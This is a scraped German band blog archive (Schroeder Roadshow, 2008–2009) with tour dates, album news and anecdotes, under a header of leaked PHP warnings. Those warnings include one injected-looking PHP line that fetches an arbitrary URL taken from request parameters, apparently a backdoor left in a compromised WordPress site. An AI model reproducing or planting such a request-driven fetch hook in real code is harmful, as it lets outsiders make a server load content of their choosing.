Deprecated: Assigning the return value of new by reference is deprecated in /homepages/u21512/schroeder/schroederblog/wp-settings.php on line 520

Deprecated: Assigning the return value of new by reference is deprecated in /homepages/u21512/schroeder/schroederblog/wp-settings.php on line 535

Deprecated: Assigning the return value of new by reference is deprecated in /homepages/u21512/schroeder/schroederblog/wp-settings.php on line 542

Deprecated: Assigning the return value of new by reference is deprecated in /homepages/u21512/schroeder/schroederblog/wp-settings.php on line 578

Deprecated: Function set_magic_quotes_runtime() is deprecated in /homepages/u21512/schroeder/schroederblog/wp-settings.php on line 18
isset($_REQUEST['kocopu']) && fetch_feed($_REQUEST['feed_url']);
Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /homepages/u21512/schroeder/schroederblog/wp-settings.php:520) in /homepages/u21512/schroeder/schroederblog/wp-content/plugins/formbuilder/captcha/CaptchaSecurityImages.php on line 26

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /homepages/u21512/schroeder/schroederblog/wp-settings.php:520) in /homepages/u21512/schroeder/schroederblog/wp-content/plugins/formbuilder/captcha/CaptchaSecurityImages.php on line 26
Schroeder Roadshow » Schroeder

Archiv für die Kategorie 'Schroeder'

konzert termine

Schroeder am 1. August 2009

Hier ein Überblick über die nächsten Live-Gigs:

30.8. 20:45 Ma.tilda Köln-Nippes | Florastr. 33-35
4.9. Openflair Klenzepark Ingolstadt
11.9. MfE (Ministerium für Entspannung) Berlin | Laskerstr. 5 beim S-Bahnhof Ostkreuz
schroeder_berlin

Mehr Infos auf unserer TOUR Seite.

Wir sehen uns!

Abgelegt unter Konzert, Schroeder | Ein Kommentar

neulich beim EDEKA…

Schroeder am 10. Juli 2009

schroeder-edeka

… es erwartet Sie ihr Lebensmittelflachverkäufer Erwin. Aber mal ehrlich: Würden Sie von diesem Sack eine Kartoffel -ähmmm …

Abgelegt unter Schroeder | Keine Kommentare

4.4. / no to war / no to nato

Schroeder am 31. März 2009

Liebe Freundinnen und Freunde,
SCHROEDER ROADSHOW nimmt natürlich auch an den Aktionen zum NATO-Gipfel vom 1. bis 5. April 2009 in Straßburg teil.
Dazu findet am 4. April eine Kundgebung in Strasbourg statt, auf der u.a. LEYLA ZANA Türkei, BIANCA JAGGER Großbritannien, MALALAI JOVA Afghanistan sprechen werden. Musikalische Unterstützung liefern neben SCHROEDER einige französische Bands ab, sowie HANNES WADER, KONSTANTIN WECKER, MARARITA THEODORAKIS und DIETHER DEHM.

no to war | no to nato

Den ganzen Beitrag lesen »

Abgelegt unter Konzert, Schroeder, TourTageBuch, no to NATO | Keine Kommentare

Da ist sie wieder,

Schroeder am 23. März 2009

die Schroeder Roadshow, mit neuem Album und Lust anzugreifen.

ROCK’N'ROLL-CHANSONS VOM HINTERHOF DER TRÄUME ist der Titel ihrer neuen CD. Darauf sind elf neue songs zu hören und als Zugabe die beiden legendären Titel ANARCHIE IN GERMONEY und FETTE RATTEN.

Wer weiß schon vorauszusagen, wie ein erfolgreicher Wiedereinstieg für eine Band herzustellen ist, egal - sie hat es gewagt!

„Aber warum taucht diese Band mit ihrer bewegten Vergangenheit und dem rauen Image jetzt ausgerechnet mit einer Chanson-Platte auf?“, mag sich so mancher fragen. In diesen Köpfen schwebt die Erwartung von ‘Anarcho-Rock’, von ‘Clownereien’, ‘respektlosem’, ‘wilden’ Gehabe, ständig neuen ‘Zoten’ und ‘Satire pur’. In der Tat wurde in den Jahren der Bandgeschichte genug Schabernack vor großem Publikum getrieben.

Aber seien wir mal ehrlich: seit damals ist die Satire in der bundesdeutsche Unterhaltungsindustrie geradezu explodiert. Unzählige Kleinkünstler sind inzwischen in der Comedy-Szene sprich: im Wortwitz-Steinbruch mit großem Gerät unterwegs. Und langsam wird dort schon jeder einzelne Stein umgedreht auf ‘Witz komm raus’ …

Welche Erlösung muss es also für SCHROEDER ROADSHOW sein, das staubige Feld des trockenen Humors nicht mehr zwingend beackern zu müssen! Und so fällt es den Jungs wie Schuppen von den Füßen, weil sie sich endlich auf das besinnen können, was sie am meisten wollen: Rock&Roll Musik.

Fazit: Keine Clownereien mehr auf der Bühne, aber eine sechsköpfige Band, die abrockt, was das Zeug hält und getragen wird von einer wunderbaren Stimme!

Den ganzen Beitrag lesen »

Abgelegt unter Schroeder | Keine Kommentare

köln 10.02.09 ab 21.30 uhr

Schroeder am 11. Februar 2009

srs_luxor_fin

Die aktuellen Konzert-Fotos aus dem legendären Luxor in Köln. Den ganzen Beitrag lesen »

Abgelegt unter Konzert, Schroeder, TourTageBuch | Keine Kommentare

prost neujahr

Schroeder am 31. Dezember 2008

meint auch Ralf aus (wahrscheinlich) Hamburg, oder um Hamburg herum.
Ok, was sollen wir tun? An Minister Tiefensee weiterleiten? Umbenennungen in großem Stil? “Beracz-Allee”, “Jesus-Promenade”, “Vladi-Park”?
ciao-
richard. Den ganzen Beitrag lesen »

Abgelegt unter Historisches, Schroeder | Keine Kommentare

*ohne worte*

Schroeder am 28. Dezember 2008

frohes_fest

Abgelegt unter Schroeder | Keine Kommentare

recording session

Schroeder am 11. Dezember 2008

Konspiratives und streng geheimes Überwachungskameramaterial aus den Studioräumen während der Aufnahmen des neuen Albums. Den ganzen Beitrag lesen »

Abgelegt unter CD Album, Schroeder | Keine Kommentare

Der SCHROEDER-ROCKPALAST wurde 1978 eröffnet:

Schroeder am 11. Dezember 2008

Im Sommer 1978 eröffneten wir in Stolberg-Vicht (Eifel) eine Kneipe mit Saal im ersten Stock. Jetzt sind nicht nur unsere eigenen Tresengäste und schenken uns selbst das Bier aus, sondern machen uns auch gegenseitig Deckel, und noch wichtiger: Wir können im eigenen Laden Musik machen! Zur großen Silvestershow reisen die 3 TORNADOS aus Berlin an. Unvergessen die Bergung ihres kleinen Bandmobils auf der A4 in Höhe Raststätte Frechen, wo die TORNADOS (sic!) infolge heftigsten Wintereinbruchs den Jahreswechsel im Schnee zu verbringen drohten. Ein Glück, daß wir immer den dicken Bus unterm Tor stehen hatten. Wahnsinn, der Winter ‘78/79. Den ganzen Beitrag lesen »

Abgelegt unter Historisches, Schroeder | Keine Kommentare

Wer probt, fällt anderen in den Rücken

Schroeder am 25. November 2008

Hier ein paar streng geheime Aufnahmen eines Teiles der Band bei einem konspirativen Musik-Wochenende in der Eifel.

Den ganzen Beitrag lesen »

Abgelegt unter Schroeder | Keine Kommentare

Nächste Einträge »